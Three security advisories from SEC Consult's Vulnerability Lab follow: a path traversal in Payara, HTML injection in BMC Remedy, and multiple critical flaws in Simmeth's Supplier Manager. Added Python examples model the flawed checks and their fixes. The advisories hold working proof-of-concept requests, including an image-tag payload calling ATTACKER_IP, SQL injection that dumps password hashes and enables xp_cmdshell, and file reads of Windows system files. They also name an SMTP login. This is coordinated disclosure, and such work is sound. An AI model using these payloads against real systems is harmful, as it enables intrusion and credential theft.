<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221114-0 ><br />=======================================================================<br /> title: Path Traversal Vulnerability<br /> product: Payara Platform<br /> vulnerable version: Enterprise: <5.45.0<br /> Community: <6.2022.1, <5.2022.4, <4.1.2.191.38<br /> fixed version: Enterprise: 5.45.0<br /> Community: 6.2022.1, 5.2022.4, 4.1.2.191.38<br /> CVE number: CVE-2022-45129<br /> impact: High<br /> homepage: https://www.payara.fish<br /> found: 2022-09-29<br /> by: Michael Baer (Office Nuremberg)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Payara Micro Community is the open source, lightweight middleware platform of choice<br />for containerized Jakarta EE application deployments. Less than 70MB, Payara Micro<br />requires no installation, configuration, or code rewrites."<br /><br />Source: https://www.payara.fish/products/payara-platform-community/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected versions which should be installed<br />immediately.<br /><br />SEC Consult highly recommends performing a thorough security review of the<br />Payara software by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Path Traversal Vulnerability (CVE-2022-45129)<br />A path traversal similar to the older CVE-2021-41381 allows, under some circumstances,<br />bypassing the protection of the WEB-INF/ and META-INF/ folders. It is possible to read<br />files inside these directories of the deployed application.
They mostly<br />contain configuration files for the application but may also contain source code.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Path Traversal Vulnerability (CVE-2022-45129)<br />a) (Setup)<br />Deploy a web application at the root context (/). For this PoC,<br />the following application was used: https://github.com/AKSarav/SampleWebApp<br />===============================================================================<br />java -jar ./appserver/extras/payara-micro/payara-micro-distribution/target/payara-micro.jar --port 1234 --deploy app.war --contextroot /<br />===============================================================================<br />This application uses the org.apache.catalina.servlets.DefaultServlet for serving files.<br />The deployment at root (/) is crucial. The webapp has the following structure:<br />.<br />├── WEB-INF<br />│ ├── web.xml<br />│ └── weblogic.xml<br />├── META-INF<br />│ └── context.xml<br />├── index.html<br />└── welcome.jsp<br /><br />b) (Attack)<br />The attacking payload is an HTTP request with a path starting with ../<webapp-name>/<br />(note that it does not start with /). 
To issue this request, a netcat connection can<br />be used:<br />===============================================================================<br />$ nc localhost 1234<br />GET ../app/WEB-INF/web.xml HTTP/1.1<br />Host: abc<br /><br />===============================================================================<br />The server's response:<br />===============================================================================<br />HTTP/1.1 200 OK<br />Server: Payara Micro #badassfish<br />Accept-Ranges: bytes<br />ETag: W/"688-1664529724289"<br />Last-Modified: Fri, 30 Sep 2022 09:22:04 GMT<br />Content-Type: application/xml<br />Content-Length: 688<br />X-Frame-Options: SAMEORIGIN<br /><br /><?xml version="1.0" encoding="UTF-8"?><br />[...]<br />===============================================================================<br />It is possible to access all files in the app's directory /app.<br />The issue arises because the leading ../ is not detected as<br />escaping the context, and the code in StandardContextValve.java<br />later only checks whether the path begins with the forbidden directories<br />/META-INF/ and /WEB-INF/:<br />===============================================================================<br />requestPath.toUpperCase().startsWith("/META-INF/", 0)<br />===============================================================================<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The vulnerability was found in version 5.2022.3 (using jdk8-openjdk 8.345.u01-1)<br />and was also verified on the Payara6 branch with the latest commit at the time<br />of the test: e5f68cda7a72c0c15fb55b724fe5d2e1e6255510 (using jdk11-openjdk 11.0.16.1.u1-2).<br /><br />In both cases, the application was self-compiled from the official GitHub repository<br />on an Arch Linux distribution.<br /><br />According to the vendor, "This vulnerability affects ALL the distributions of the<br />Payara Platform (Server Full,
Server Web, Micro, Embedded, Docker images)<br />in every edition and major version."<br /><br />The vulnerable versions are all before 6.2022.1, 4.1.2.191.38, 5.2022.4 (Community Edition)<br />and 5.45.0 (Enterprise Edition).<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-05: Contacting vendor through security@payara.fish asking for encryption key.<br /> Vendor agreed to proceed without an encrypted channel.<br />2022-10-06: Sent security advisory to vendor.<br />2022-10-08: Vendor cannot reproduce vulnerability.<br />2022-10-10: Sending additional / more detailed information.<br />2022-10-12: Vendor confirms the vulnerability.<br />2022-10-17: Contacting vendor to coordinate release date.<br />2022-10-25: Vendor notifies that the fix is applied and live in the repository; we should wait<br /> for marketing to put patch notes online.<br />2022-11-02: Contacting vendor to ask for the list of affected and fixed versions, the CVE<br /> number, and whether marketing has already sent out the information.
No reply.<br />2022-11-09: Noticed that the new version and patch notes are already available online.<br /> Requesting CVE number through MITRE.<br />2022-11-10: Sending CVE number to vendor.<br />2022-11-11: Informing vendor about public release date on 2022-11-14.<br />2022-11-14: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor fixed the software to detect illegal path traversals.<br />The fixed versions are<br />* 6.2022.1 (Community Edition)<br />* 5.2022.4 (Community Edition)<br />* 4.1.2.191.38 (Community Edition)<br />* 5.45.0 (Enterprise Edition)<br /><br />The Community Edition can be downloaded from the vendor's website:<br /><br />https://www.payara.fish/downloads/payara-platform-community-edition/<br /><br />The Enterprise Edition can be requested from Payara's sales team.<br /><br /><br />Further information regarding the vulnerability and releases can be<br />found on the vendor's website:<br /><br />https://blog.payara.fish/whats-new-in-the-november-2022-payara-platform-release<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker.
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Michael Baer / @2022<br /><br /></code></pre>
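The prefix-only check quoted in the Payara advisory above, modelled next to a hardened check, as an added Python example that is not part of the advisory or of Payara's code. The function names and the single percent-decoding step are assumptions; a real container normalizes the URI before the valve, so the model only shows why matching the start of the raw path is not enough.

```python
from urllib.parse import unquote

# Directories a servlet container must never serve directly.
PROTECTED_DIRS = frozenset({"WEB-INF", "META-INF"})


def prefix_only_check(request_path: str) -> bool:
    """Model of the check quoted in the advisory: only the start of the raw
    path is compared, so a target such as '../app/WEB-INF/web.xml' (no leading
    slash) is never rejected. Returns True when the request would be served."""
    upper = request_path.upper()
    return not (upper.startswith("/META-INF/", 0) or upper.startswith("/WEB-INF/", 0))


def canonical_path(request_target: str) -> str:
    """Turn a request target into a canonical absolute path, resolving '.' and
    '..' segment by segment. Raises ValueError for anything that is not an
    origin-form target or that climbs above the context root."""
    if not request_target.startswith("/"):
        raise ValueError("request target must be origin-form (start with '/')")
    path = request_target.split("?", 1)[0]
    path = unquote(path)  # decode once; assumption: nothing was decoded before us
    if "\x00" in path:
        raise ValueError("NUL byte in path")
    segments: list[str] = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                raise ValueError("path traversal above the context root")
            segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_protected(canonical: str) -> bool:
    """True if any segment of the canonical path is a protected directory,
    compared case-insensitively (the advisory's check also upper-cases)."""
    return any(seg.upper() in PROTECTED_DIRS for seg in canonical.split("/") if seg)


def hardened_check(request_target: str) -> bool:
    """Serve only if the target canonicalises cleanly and touches no protected
    directory anywhere in the path, not just at its start."""
    try:
        canonical = canonical_path(request_target)
    except ValueError:
        return False
    return not is_protected(canonical)


if __name__ == "__main__":
    # The PoC target from the advisory next to ordinary and edge-case requests.
    for target in ("../app/WEB-INF/web.xml", "/WEB-INF/web.xml", "/web-inf/web.xml",
                   "/index.html", "/static/../WEB-INF/web.xml", "/%57EB-INF/web.xml"):
        print(f"{target!r:34} prefix-only={prefix_only_check(target)!s:5} "
              f"hardened={hardened_check(target)}")
```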
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221110-0 ><br />=======================================================================<br /> title: HTML Injection<br /> product: BMC Remedy ITSM-Suite<br /> vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)<br /> fixed version: 22.1<br /> CVE number: CVE-2022-26088<br /> impact: Low<br /> homepage: https://www.bmc.com/it-solutions/remedy-itsm.html<br /> found: 2021-08-11<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix<br />ITSM service provide out-of-the-box IT Information Library (ITIL)<br />service support functionality. Remedy ITSM Suite and BMC Helix ITSM<br />service streamline and automate the processes around IT service desk,<br />asset management, and change management operations. It also enables<br />you to link your business services to your IT infrastructure to help<br />you manage the impact of technology changes on business and business<br />changes on technology — in real time and into the future.
In addition,<br />you can understand and optimize the user experience, balance current<br />and future infrastructure investments, and view potential impact on<br />the business by using a real-time service model."<br /><br />Source: https://docs.bmc.com/docs/itsm91/home-608490971.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an updated version, which should be installed immediately.<br /><br />The vendor states that:<br /> > We have done hardening in version 22.1.<br /> > However, we do not agree with assigning the CVE to this vulnerability.<br /> > As mentioned previously this is an informative vulnerability, and no real<br /> impact is demonstrated.<br /><br /><br />Nevertheless, this can be used to trigger actions on internal services via CSRF or<br />exfiltrate information.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) HTML Injection (CVE-2022-26088)<br />An authenticated attacker who can forward incidents by email is able to inject<br />a limited set of HTML tags. This is accomplished by inserting arbitrary content<br />into the "To:" field of the email. There is a filtering mechanism that prevents<br />the injection of many HTML tags, for example <script>, and it also removes event<br />handlers. An attacker is able to insert an image tag with an arbitrary src URL.<br /><br />After sending the email, an entry is appended to the activity log of the<br />incident which states that $USER has sent an email to <X> recipients. Upon<br />clicking on the number <X>, the injected HTML code is loaded and executed.<br /><br />By inserting an <img> with an arbitrary "src" attribute, an attacker can force<br />the user's browser to make requests to a URL of the attacker's choosing.
This can be used to<br />trigger actions on internal services via CSRF or exfiltrate information.<br /><br /><br />Proof of concept:<br />-----------------<br />1) HTML Injection (CVE-2022-26088)<br />When an incident is viewed, there is a button which allows forwarding the<br />incident by mail. After entering a TO address and the body of the email, it can<br />be sent by clicking on the send button.<br /><br />The HTML injection can be performed by intercepting this request and changing<br />the 'Email.To.InternetEmail' parameter. The modified request is:<br /><br />-------------------------------------------------------------------------------<br />PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1<br />Host: TARGET<br />Cookie: […]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json;charset=utf-8<br />X-Xsrf-Token: SOME_TOKEN<br />Content-Length: ADAPT_AS_NEEDED<br />Te: trailers<br />Connection: close<br /><br />{<br /> "worknote": "pentest",<br /> "access": true,<br /> "Email.From.Person": {<br /> "email": "SOME_SENDING_MAIL",<br /> "fullName": "Pentest - SEC Consult",<br /> "loginId": "USERNAME"<br /> },<br /> "Email.Subject": "SOME_SUBJECT",<br /> "Email.Body": "test2",<br /> "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",<br /> "workInfoType": 16000<br />}<br />-------------------------------------------------------------------------------<br /><br />The parameter Email.To.InternetEmail contains the payload. 
In this case, an<br />image tag containing the IP of the attacker was inserted:<br />"<img src=http://LOCAL_IP:8001/>a@example.test"<br />The a@example.test is needed to pass the email validation step and example.test<br />was used to prevent sending out real emails.<br /><br />After this step, the information that $USER has sent an email to 1 recipient<br />will be appended to the activity log of this incident.<br /><br /><br />Now we start a local netcat listener with the command<br />$ nc -vnlp 8001<br /><br />Now we click on the number '1' in the activity log and see that the browser<br />issues a request to our 'netcat' instance.<br /><br />This confirms that the browser tries to load the image from the specified URL.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* 9.1.10, which corresponds to version 20.02 as stated at the following URL:<br />https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-09-07: Contacting vendor through email (appsec@bmc.com).<br />2021-09-28: Vendor states that they did not get the first email.<br />2021-09-29: Resending the advisory to their renewed GPG key.<br />2021-10-29: Fix pending, request to delay publication.<br />2021-11-18: Vulnerability is fixed and the fix is being evaluated.<br />2022-01-17: Asking for a status update.<br />2022-01-17: Vulnerability is fixed, no scheduled release.<br />2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.<br />2022-02-24: Fixed in Smart-IT 22.1, release postponed.<br />2022-03-30: Release postponed to May 2022.<br />2022-04-20: Asking if the fixed version will be released in May.<br />2022-05-17: Asking if the fixed version will be released in May.<br />2022-05-23: Release rescheduled to end of June/July.<br />2022-08-04: Asking for status.<br />2022-08-05: Product was
released.<br />2022-08-31: Asking for link to update.<br />2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again.<br />2022-09-06: Vendor asks for final version of advisory.<br />2022-09-06: Asking vendor for a new GPG key because of expiry.<br />2022-09-07: Sending the final advisory to the vendor.<br />2022-09-12: Vendor will check the advisory and answer in 1 or 2 days.<br />2022-09-14: Vendor states that their application is not vulnerable to CSRF and<br /> asks if other data could be leaked via the HTTP request.<br />2022-09-15: We clarify that their application does not seem to be vulnerable to<br /> CSRF but the HTML injection allows CSRFing other applications in the intranet.<br /> Also we did not have time to assess if other data besides User-Agent and the<br /> client's IP can be leaked.<br />2022-10-04: We request an update to the previous mail.<br />2022-10-19: Vendor sticks to their own original impact analysis.<br />2022-11-10: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Upgrade to version 22.1 or later, which can be downloaded from the vendor's page:<br />https://www.bmc.com/support/resources/product-downloads.html<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2022<br /><br /></code></pre>
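A constructed Python example, not part of the BMC advisory above or of the product, contrasting a blocklist filter of the kind the advisory describes (it strips script tags and event handlers but passes other tags) with the two controls that close the issue: rejecting a To field that is not a list of addresses, and escaping it for the HTML context it is rendered in. The address pattern and the function names are assumptions of the example.

```python
import html
import re

# Constructed model of the filter the advisory describes: it removes <script>
# blocks and on* event handlers and passes everything else through unchanged.
_SCRIPT_RE = re.compile(r"(?is)<script\b[^>]*>.*?</script>")
_HANDLER_RE = re.compile(r"""(?i)\s+on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)""")


def tag_blocklist_filter(value: str) -> str:
    """Blocklist sanitiser: strips what it knows about and keeps the rest, so an
    <img src=...> with no handler survives and still triggers an outbound request."""
    value = _SCRIPT_RE.sub("", value)
    return _HANDLER_RE.sub("", value)


# The To field only ever holds addresses, so the fix is to validate its shape and
# reject anything else instead of trying to clean it. Deliberately strict pattern.
_ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9\-]+(\.[A-Za-z0-9\-]+)*\.[A-Za-z]{2,}$")


def validate_recipients(raw: str) -> list[str]:
    """Split a To field on commas or semicolons and accept it only if every
    entry is a plain address; raises ValueError otherwise."""
    recipients = [part.strip() for part in re.split(r"[,;]", raw) if part.strip()]
    if not recipients:
        raise ValueError("no recipients")
    for addr in recipients:
        if not _ADDRESS_RE.match(addr):
            raise ValueError(f"not a valid address: {addr!r}")
    return recipients


def is_valid_recipient_field(raw: str) -> bool:
    """Convenience wrapper: True if validate_recipients would accept the field."""
    try:
        validate_recipients(raw)
    except ValueError:
        return False
    return True


def render_recipient_list(recipients: list[str]) -> str:
    """Output encoding for the activity-log popup: every value is escaped for the
    HTML context it lands in, so even a stored bad value cannot become markup."""
    return ", ".join(html.escape(addr, quote=True) for addr in recipients)


if __name__ == "__main__":
    payload = "<img src=http://ATTACKER_IP:8001/>a@example.test"  # value from the advisory
    print("blocklist keeps :", tag_blocklist_filter(payload))
    print("validation      :", "accepted" if is_valid_recipient_field(payload) else "rejected")
    print("escaped output  :", render_recipient_list([payload]))
```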
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221109-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Simmeth System GmbH Supplier manager (Lieferantenmanager)<br /> vulnerable version: < 5.6<br /> fixed version: 5.6<br /> CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,<br /> CVE-2022-44015, CVE-2022-44016, CVE-2022-44017<br /> impact: critical<br /> homepage: https://www.simmeth.net<br /> found: 2022-03-01<br /> by: Steffen Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are an innovative B2B software provider for supply chain management,<br />especially in the areas of supplier management over the entire supplier<br />lifecycle and quality control, supply chain key figures and reporting.<br /><br />Our medium-sized family business is a reliable, practice-oriented partner with<br />an extraordinary wealth of experience: since 2002, our currently more than 70<br />medium-sized and corporate customers have trusted our solutions and our<br />pragmatically oriented expertise."<br /><br />Source: https://www.simmeth.net/en/company/about-us<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised to identify and resolve potential further critical security<br />issues.
<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)<br />An attacker can inject raw SQL queries. By activating MSSQL features, the<br />attacker is able to execute arbitrary commands on the MSSQL server.<br /><br />2) Faulty API Design (CVE-2022-44014)<br />The API is designed such that an attacker can fetch arbitrary SQL tables.<br />This leaks all user passwords and MSSQL hashes.<br /><br />3) Local File Access (CVE-2022-44016)<br />An attacker can download arbitrary files from the web server by abusing an API<br />call.<br /><br />4) Leak of Simmeth's SMTP password<br />A cleartext password for the email account "LM@simmeth.net" is leaked during<br />the login process.<br /><br />5) Stored Cross-Site Scripting (CVE-2022-44012)<br />An attacker can execute JavaScript code in the victim's browser when the site<br />is loaded. The victim's encrypted password can be stolen and most likely be<br />decrypted.<br /><br />6) Authentication Bypass (CVE-2022-44013)<br />An attacker can access multiple API calls without authentication. Thus, all<br />outlined attacks can be executed without knowing any valid credentials.<br /><br />7) Errors in Session management (CVE-2022-44017)<br />Due to errors in the session management, an attacker can log back into a<br />victim's account after the victim logged out. This is due to the credentials not<br />being cleared from local storage after logout.<br /><br />8) Information Disclosure<br />Multiple requests return verbose error messages, which helps an attacker in<br />finding and abusing a vulnerability.<br /><br /><br />Proof of concept:<br />-----------------<br />1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)<br />The following API call can be used to execute arbitrary SQL queries via a subquery<br />or stacked query in the table name.
Because of vulnerability 6, only a valid<br />username is required to send the request.<br /><br />---------------------------------<br />POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1<br />Content-Length: 1264<br />[...]<br /><br />{<br /> "Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "System": "****"<br /> },<br /> "ResultTab": {<br /> "AutoLoad": false,<br /> "Createable": true,<br /> "Databases": [<br /> {<br /> "System": "****",<br /> "Tables": [<br /> {<br /> "Columns": [],<br /> "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",<br /> "Relations": [],<br /> "Results": [<br /> {<br /> "ColumnName": "*"<br /> }<br /> ]<br /> }<br /> ]<br /> }<br /> ],<br /> "Name": "Results",<br /> "PageSize": 2000<br /> },<br /> "Ids": {},<br /> "SecondaryIds": {},<br /> "Constraints": [],<br /> "DateConstraints": {},<br /> "LogicOperator": 0,<br /> "PageNumber": 0,<br /> "Sortings": {},<br /> "TableFilters": {},<br /> "GroupByField": null,<br /> "Aggregates": {},<br /> "isExport": false<br />}<br /><br />-------------------<br />The PoC above shows an example subquery; the server responds with the resulting<br />dataset. Stacked queries are executed as well, but their results are not<br />contained in the web server's reply.
The example query will dump the MSSQL password<br />hashes.<br /><br />Further attacks include arbitrary file read with the following query:<br /><br />(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents<br />)sub;--<br /><br />And code execution via the xp_cmdshell extended procedure:<br /><br />(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;<br />RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell<br />'nslookup some.domain';--<br /><br /><br />2) Faulty API Design (CVE-2022-44014)<br />The API design allows the frontend to supply an arbitrary table name<br />(called <TABLE NAME HERE> in the POC below) into the following request.<br />Because of vulnerability 6, only a valid username is required to send the<br />request.<br /><br />---------------------------------<br />POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1<br />Content-Length: 1264<br />[...]<br /><br />{<br /> "Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "System": "****"<br /> },<br /> "ResultTab": {<br /> "AutoLoad": false,<br /> "Createable": true,<br /> "Databases": [<br /> {<br /> "System": "****",<br /> "Tables": [<br /> {<br /> "Columns": [],<br /> "Name": "<TABLE NAME HERE>",<br /> "Relations": [],<br /> "Results": [<br /> {<br /> "ColumnName": "*"<br /> }<br /> ]<br /> }<br /> ]<br /> }<br /> ],<br /> "Name": "Results",<br /> "PageSize": 2000<br /> },<br /> "Ids": {},<br /> "SecondaryIds": {},<br /> "Constraints": [],<br /> "DateConstraints": {},<br /> "LogicOperator": 0,<br /> "PageNumber": 0,<br /> "Sortings": {},<br /> "TableFilters": {},<br /> "GroupByField": null,<br /> "Aggregates": {},<br /> "isExport": false<br 
/>}<br /><br />-------------------<br /><br />This is a design fault, as the attacker has full control of the table<br />name. Therefore, an arbitrary table such as the user tables<br />(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.<br /><br /><br />3) Local File Access (CVE-2022-44016)<br />The "GetImages" API call can be abused to read arbitrary files from the file<br />system. This is because the API allows the image path to be set from the<br />frontend.<br /><br />By pointing the base path to C:\, all files can be accessed.<br />Because of vulnerability 6, the request requires no credentials.<br /><br />-----------------------<br />POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1<br />Content-Length: 229<br />[...]<br /><br />{"Credential":{<br />"Mandant":{<br />"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"<br />},<br />},<br />"ImagesPath":"C:\\",<br />"ListImageNames":[<br /> "Windows\\win.ini",<br /> "boot.ini",<br /> "Windows\\system32\\eula.txt",<br /> "Windows\\System32\\drivers\\etc\\hosts"<br />]<br />}<br />--------------------<br />The files are returned base64-encoded. Thus, even binary data can be extracted<br />from the server.<br /><br /><br />4) Leak of Simmeth's SMTP password<br />The following API call will return the current configuration. The configuration<br />seems to contain cleartext credentials for Simmeth's SMTP server.
The<br />request does not require any credentials.<br /><br />-----------------<br />POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1<br />Content-Length: 70<br />Content-Type: application/json<br /><br /><br />{<br />"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}<br />}<br />----------------<br /><br />The server responds with:<br /><br />---------------<br />[...]<br />"KPIIntro":{<br />"IsAccessLog":true,<br />"MailSettings":{<br />"Host":"vwp4261.webpack.hosteurope.de",<br />"IsAuthentification":true,<br />"IsSSL":false,<br />"LoginName":"wp10481666-supply",<br />"Password":"K***********a",<br />"Port":"25",<br />"Sender":"LM@simmeth.net"<br />[...]<br />--------------<br />Thus, an attacker could send phishing mails from an official Simmeth account.<br /><br /><br />5) Stored Cross-Site Scripting (CVE-2022-44012)<br />The following request can be used to store JavaScript code into the database. It<br />will be fetched and executed in the victim's browser, once the site is visited.<br />Because of vulnerability 6, only a valid username is required to send the request.<br /><br />--------------<br />POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1<br />Content-Length: 3311<br /><br />{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString<br />":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},<br />"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName"<br />:"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=x<br />onerror=alert(document.domain)>test","Lie_ID":4167},<br />[...]<br />---------------<br /><br />The XSS can be used to steal the encrypted passwords from the local storage.<br />As the API uses cleartext passwords with every request, it is most likely<br />possible to exfiltrate the passwords in cleartext as well.<br /><br /><br 
/>6) Authentication Bypass (CVE-2022-44013)<br />All API calls start by supplying the Credential object.<br />----------------<br />"Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "Password": "*********",<br /> "System": "****"<br /> },<br /><br />----------------<br />However, the password can just be removed. It seems to be checked only on the<br />login API call. Thus, all requests can be made with just a username. The tested<br />environment contained a user called "simmeth".<br />Most likely this is a default user and thus always available, lowering the<br />requirements for authenticated requests even further.<br /><br /><br />7) Errors in Session management (CVE-2022-44017)<br />An attacker can abuse a session management vulnerability in order to log back<br />into a user account after the user logged out.<br />The encrypted password and username saved in the local storage of the<br />web browser are not cleared on logout and always stay valid. Hence, only the<br />frontend state changes and the user appears to be logged out.<br />An attacker can force the frontend state back into the logged-in state by<br />visiting: https://<your-host>/LMS/LM/#main<br /><br /><br />8) Information Disclosure<br />The application replies with verbose error messages when exceptions are<br />triggered. This can help an attacker gain knowledge about the backend and<br />aid in the development of exploits.<br />Entering, e.g., a single apostrophe into the table name of vulnerability 2 will<br />cause the web server to print a full stack trace as well as the rest of the SQL<br />query.
Hence, the SQL statement can easily be updated to execute properly.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The test was conducted on version 5.4, which was found to be vulnerable.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Contacting vendor through info@simmeth.net.<br />2022-04-01: Simmeth requested to know in which customer's environment the<br /> vulnerabilities were discovered.<br />2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.<br />2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already<br /> contains fixes. SEC Consult requests the version number of the fixed version.<br />2022-04-06: Simmeth communicates the fixed version numbers, advisory is sent via<br /> unencrypted email.<br />2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.<br />2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new<br /> and currently being fixed.<br />2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.<br /> A new API will be created by the end of the year.<br />2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.<br />2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take<br /> until end of July.<br />2022-09-02: Asking about CVE numbers and if all customers are patched.<br />2022-09-05: Some customers are not yet patched. Current version is phased out by the<br /> end of September. All customers will have to upgrade by then. SEC Consult<br /> will request CVE numbers.<br />2022-10-05: Requested status update.<br />2022-10-17: All customers are updated.<br />2022-11-09: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides patched version 5.6, which fixes the identified<br />security issues.
